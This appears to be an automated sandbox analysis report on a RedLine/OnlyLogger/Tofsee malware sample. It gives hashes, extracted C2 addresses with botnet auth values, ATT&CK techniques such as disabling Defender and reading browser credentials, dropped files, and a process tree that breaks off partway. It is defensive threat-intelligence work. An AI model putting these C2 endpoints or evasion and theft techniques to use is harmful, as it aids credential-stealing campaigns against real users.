onlylogger | 934a9881f22c30976cb47fdef452982f4dca6a0b94e67d2c64fe798850601771

Analysis

max time kernel
20s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
21-02-2022 21:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

40a661d08299576603e8598dcbe52cd4.exe
Size

365KB
MD5

40a661d08299576603e8598dcbe52cd4
SHA1

793eb79c019a66ac6c58a6b464be11cdcfbb2958
SHA256

934a9881f22c30976cb47fdef452982f4dca6a0b94e67d2c64fe798850601771
SHA512

ef1030f30eb14e5c83c2f3e31f6af83b858e2d379d98d9d1f8333431d8226179fbe894ea6048bd21970a942f3786a3eddedc2989bd7e13b77970b1acc95c9ab8

Score

10^/10

onlylogger redline tofsee 333333 ruzzki evasion infostealer loader persistence spyware stealer themida trojan upx

Malware Config

Extracted

Family

redline

Botnet

ruzzki

5.182.5.22:32245

Attributes

auth_value
d8127a7fd667fc38cff03ff9ec89f346

Extracted

Family

redline

Botnet

333333

2.56.57.212:13040

Attributes

auth_value
3efa022bc816f747304fd68e5810bb78

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4776 1036 rundll32.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4776	1036	rundll32.exe

RedLine Payload 22 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1788-177-0x00000000009D0000-0x0000000000C01000-memory.dmp	family_redline
behavioral2/memory/1788-176-0x00000000009D2000-0x0000000000A08000-memory.dmp	family_redline
behavioral2/memory/1788-167-0x00000000009D2000-0x0000000000A08000-memory.dmp	family_redline
behavioral2/memory/1788-165-0x00000000009D0000-0x0000000000C01000-memory.dmp	family_redline
behavioral2/memory/4760-252-0x00000000000A2000-0x00000000000D7000-memory.dmp	family_redline
behavioral2/memory/1884-270-0x0000000000380000-0x0000000000513000-memory.dmp	family_redline
behavioral2/memory/4760-288-0x00000000000A0000-0x0000000000262000-memory.dmp	family_redline
behavioral2/memory/2296-291-0x00000000000A0000-0x0000000000262000-memory.dmp	family_redline
behavioral2/memory/4760-283-0x00000000000A0000-0x0000000000262000-memory.dmp	family_redline
behavioral2/memory/4644-281-0x00000000000A0000-0x0000000000262000-memory.dmp	family_redline
behavioral2/memory/4644-278-0x00000000000A0000-0x0000000000262000-memory.dmp	family_redline
behavioral2/memory/2296-268-0x00000000000A0000-0x0000000000262000-memory.dmp	family_redline
behavioral2/memory/1884-266-0x0000000000380000-0x0000000000513000-memory.dmp	family_redline
behavioral2/memory/4240-253-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/4644-249-0x00000000000A0000-0x0000000000262000-memory.dmp	family_redline
behavioral2/memory/4760-248-0x00000000000A0000-0x0000000000262000-memory.dmp	family_redline
behavioral2/memory/1884-240-0x0000000000380000-0x0000000000513000-memory.dmp	family_redline
behavioral2/memory/5212-341-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/3568-386-0x0000000003B00000-0x0000000003B2F000-memory.dmp	family_redline
behavioral2/memory/1552-424-0x0000000000380000-0x0000000000513000-memory.dmp	family_redline
behavioral2/memory/4680-428-0x0000000000380000-0x0000000000513000-memory.dmp	family_redline
behavioral2/memory/4676-429-0x0000000000890000-0x0000000000A2D000-memory.dmp	family_redline

Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3472-227-0x00000000035D0000-0x0000000003614000-memory.dmp	family_onlylogger
behavioral2/memory/3472-228-0x0000000000400000-0x0000000000447000-memory.dmp	family_onlylogger

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 7 IoCs

Processes:

z5iVJ3zfF9iG4PxphIHSKcid.exeBwg_uIQ0e5FI5hX1oTxOL__V.exek3ihcWqxTJMAf2JTxRoW0pAX.exeMtT1mcxH6eO9PgzuN4sOqsOG.exe1gC2vZxQ5rugSU5h48p0XCSL.exeSoha7tT3rFdzPbjP7tw88TTB.exeItOTVrcrmUZlzEV4QD3hNz3D.exe

pid	process
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
3568	Bwg_uIQ0e5FI5hX1oTxOL__V.exe
3472	k3ihcWqxTJMAf2JTxRoW0pAX.exe
1888	MtT1mcxH6eO9PgzuN4sOqsOG.exe
3516	1gC2vZxQ5rugSU5h48p0XCSL.exe
3356	Soha7tT3rFdzPbjP7tw88TTB.exe
376	ItOTVrcrmUZlzEV4QD3hNz3D.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\Soha7tT3rFdzPbjP7tw88TTB.exe	upx
C:\Users\Admin\Pictures\Adobe Films\Soha7tT3rFdzPbjP7tw88TTB.exe	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

40a661d08299576603e8598dcbe52cd4.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	40a661d08299576603e8598dcbe52cd4.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\Z3bpbGtkYchSHAAsd2nmWnVg.exe	themida
C:\Users\Admin\Pictures\Adobe Films\Z3bpbGtkYchSHAAsd2nmWnVg.exe	themida
behavioral2/memory/4804-220-0x0000000000940000-0x0000000000D03000-memory.dmp	themida
behavioral2/memory/4804-230-0x0000000000940000-0x0000000000D03000-memory.dmp	themida
behavioral2/memory/5888-417-0x0000000000A00000-0x0000000000DD4000-memory.dmp	themida
behavioral2/memory/5888-419-0x0000000000A00000-0x0000000000DD4000-memory.dmp	themida

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

253 ip-api.com
28 ipinfo.io
29 ipinfo.io
144 ipinfo.io
145 ipinfo.io
174 ipinfo.io

flow	ioc
253	ip-api.com
28	ipinfo.io
29	ipinfo.io
144	ipinfo.io
145	ipinfo.io
174	ipinfo.io

Drops file in Windows directory 1 IoCs

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat	svchost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 25 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4672	3696	WerFault.exe	bdO_s0qteNmJYXw98Y0RP25H.exe
4692	872	WerFault.exe
4660	2680	WerFault.exe
4300	3568	WerFault.exe	Bwg_uIQ0e5FI5hX1oTxOL__V.exe
4744	3696	WerFault.exe	bdO_s0qteNmJYXw98Y0RP25H.exe
4672	3472	WerFault.exe	k3ihcWqxTJMAf2JTxRoW0pAX.exe
656	2680	WerFault.exe	EU8nHZs9HZQWHCEAtQAgD2dr.exe
4652	872	WerFault.exe	hHcLnYPQfBx2k1m2tzAk4hgv.exe
4596	3472	WerFault.exe	k3ihcWqxTJMAf2JTxRoW0pAX.exe
5756	3472	WerFault.exe	k3ihcWqxTJMAf2JTxRoW0pAX.exe
5804	1592	WerFault.exe	_zxbKdQL59_JCI1KYbA7t8jS.exe
5348	3472	WerFault.exe	k3ihcWqxTJMAf2JTxRoW0pAX.exe
2648	4152	WerFault.exe	yJ1yaDbnWJUv6XbDedfvbuzn.exe
5688	3472	WerFault.exe	k3ihcWqxTJMAf2JTxRoW0pAX.exe
4888	4152	WerFault.exe	yJ1yaDbnWJUv6XbDedfvbuzn.exe
5428	3472	WerFault.exe	k3ihcWqxTJMAf2JTxRoW0pAX.exe
5712	5528	WerFault.exe	chcbzdvu.exe
4360	4152	WerFault.exe	yJ1yaDbnWJUv6XbDedfvbuzn.exe
5912	3472	WerFault.exe	k3ihcWqxTJMAf2JTxRoW0pAX.exe
4672	4152	WerFault.exe	yJ1yaDbnWJUv6XbDedfvbuzn.exe
5876	4152	WerFault.exe	yJ1yaDbnWJUv6XbDedfvbuzn.exe
2904	3472	WerFault.exe	k3ihcWqxTJMAf2JTxRoW0pAX.exe
1204	1612	WerFault.exe	rundll32.exe
3932	6020	WerFault.exe	bearvpn3.exe
5976	4152	WerFault.exe	yJ1yaDbnWJUv6XbDedfvbuzn.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MusNotifyIcon.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	MusNotifyIcon.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MusNotifyIcon.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4756 schtasks.exe
1904 schtasks.exe
5224 schtasks.exe
5084 schtasks.exe
1032 schtasks.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

5836 tasklist.exe
4048 tasklist.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

5128 taskkill.exe
4616 taskkill.exe

pid	process
4756	schtasks.exe
1904	schtasks.exe
5224	schtasks.exe
5084	schtasks.exe
1032	schtasks.exe

pid	process
5836	tasklist.exe
4048	tasklist.exe

pid	process
5128	taskkill.exe
4616	taskkill.exe

Modifies data under HKEY_USERS 53 IoCs

Processes:

svchost.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4188"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "14.062483"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "5.595629"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\InternetConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "1157726"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "4"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4380"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132901296808778866"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "90228624"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyLanBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "3.554989"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "2"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0"	svchost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

40a661d08299576603e8598dcbe52cd4.exez5iVJ3zfF9iG4PxphIHSKcid.exe

pid	process
1628	40a661d08299576603e8598dcbe52cd4.exe
1628	40a661d08299576603e8598dcbe52cd4.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe
1156	z5iVJ3zfF9iG4PxphIHSKcid.exe

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

40a661d08299576603e8598dcbe52cd4.exe

description	pid	process	target process
PID 1628 wrote to memory of 1156	1628	40a661d08299576603e8598dcbe52cd4.exe	z5iVJ3zfF9iG4PxphIHSKcid.exe
PID 1628 wrote to memory of 1156	1628	40a661d08299576603e8598dcbe52cd4.exe	z5iVJ3zfF9iG4PxphIHSKcid.exe
PID 1628 wrote to memory of 3568	1628	40a661d08299576603e8598dcbe52cd4.exe	Bwg_uIQ0e5FI5hX1oTxOL__V.exe
PID 1628 wrote to memory of 3568	1628	40a661d08299576603e8598dcbe52cd4.exe	Bwg_uIQ0e5FI5hX1oTxOL__V.exe
PID 1628 wrote to memory of 3568	1628	40a661d08299576603e8598dcbe52cd4.exe	Bwg_uIQ0e5FI5hX1oTxOL__V.exe
PID 1628 wrote to memory of 3472	1628	40a661d08299576603e8598dcbe52cd4.exe	k3ihcWqxTJMAf2JTxRoW0pAX.exe
PID 1628 wrote to memory of 3472	1628	40a661d08299576603e8598dcbe52cd4.exe	k3ihcWqxTJMAf2JTxRoW0pAX.exe
PID 1628 wrote to memory of 3472	1628	40a661d08299576603e8598dcbe52cd4.exe	k3ihcWqxTJMAf2JTxRoW0pAX.exe
PID 1628 wrote to memory of 1888	1628	40a661d08299576603e8598dcbe52cd4.exe	MtT1mcxH6eO9PgzuN4sOqsOG.exe
PID 1628 wrote to memory of 1888	1628	40a661d08299576603e8598dcbe52cd4.exe	MtT1mcxH6eO9PgzuN4sOqsOG.exe
PID 1628 wrote to memory of 1888	1628	40a661d08299576603e8598dcbe52cd4.exe	MtT1mcxH6eO9PgzuN4sOqsOG.exe
PID 1628 wrote to memory of 3516	1628	40a661d08299576603e8598dcbe52cd4.exe	1gC2vZxQ5rugSU5h48p0XCSL.exe
PID 1628 wrote to memory of 3516	1628	40a661d08299576603e8598dcbe52cd4.exe	1gC2vZxQ5rugSU5h48p0XCSL.exe
PID 1628 wrote to memory of 3516	1628	40a661d08299576603e8598dcbe52cd4.exe	1gC2vZxQ5rugSU5h48p0XCSL.exe
PID 1628 wrote to memory of 3356	1628	40a661d08299576603e8598dcbe52cd4.exe	Soha7tT3rFdzPbjP7tw88TTB.exe
PID 1628 wrote to memory of 3356	1628	40a661d08299576603e8598dcbe52cd4.exe	Soha7tT3rFdzPbjP7tw88TTB.exe
PID 1628 wrote to memory of 376	1628	40a661d08299576603e8598dcbe52cd4.exe	ItOTVrcrmUZlzEV4QD3hNz3D.exe
PID 1628 wrote to memory of 376	1628	40a661d08299576603e8598dcbe52cd4.exe	ItOTVrcrmUZlzEV4QD3hNz3D.exe
PID 1628 wrote to memory of 376	1628	40a661d08299576603e8598dcbe52cd4.exe	ItOTVrcrmUZlzEV4QD3hNz3D.exe
PID 1628 wrote to memory of 1788	1628	40a661d08299576603e8598dcbe52cd4.exe	5XxJmsTXlrEXOFYXNu8CSpwY.exe
PID 1628 wrote to memory of 1788	1628	40a661d08299576603e8598dcbe52cd4.exe	5XxJmsTXlrEXOFYXNu8CSpwY.exe
PID 1628 wrote to memory of 1788	1628	40a661d08299576603e8598dcbe52cd4.exe	5XxJmsTXlrEXOFYXNu8CSpwY.exe
PID 1628 wrote to memory of 1388	1628	40a661d08299576603e8598dcbe52cd4.exe	teRY4JR6QjCPYr3w9D9QIMrg.exe
PID 1628 wrote to memory of 1388	1628	40a661d08299576603e8598dcbe52cd4.exe	teRY4JR6QjCPYr3w9D9QIMrg.exe
PID 1628 wrote to memory of 1388	1628	40a661d08299576603e8598dcbe52cd4.exe	teRY4JR6QjCPYr3w9D9QIMrg.exe

C:\Users\Admin\AppData\Local\Temp\40a661d08299576603e8598dcbe52cd4.exe
"C:\Users\Admin\AppData\Local\Temp\40a661d08299576603e8598dcbe52cd4.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1628

C:\Users\Admin\Pictures\Adobe Films\z5iVJ3zfF9iG4PxphIHSKcid.exe
"C:\Users\Admin\Pictures\Adobe Films\z5iVJ3zfF9iG4PxphIHSKcid.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1156

C:\Users\Admin\Pictures\Adobe Films\Bwg_uIQ0e5FI5hX1oTxOL__V.exe
"C:\Users\Admin\Pictures\Adobe Films\Bwg_uIQ0e5FI5hX1oTxOL__V.exe"
2⤵
- Executes dropped EXE
PID:3568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 396
3⤵
- Program crash
PID:4300

C:\Users\Admin\Pictures\Adobe Films\k3ihcWqxTJMAf2JTxRoW0pAX.exe
"C:\Users\Admin\Pictures\Adobe Films\k3ihcWqxTJMAf2JTxRoW0pAX.exe"
2⤵
- Executes dropped EXE
PID:3472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 632
3⤵
- Program crash
PID:4672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 624
3⤵
- Program crash
PID:4596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 696
3⤵
- Program crash
PID:5756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 828
3⤵
- Program crash
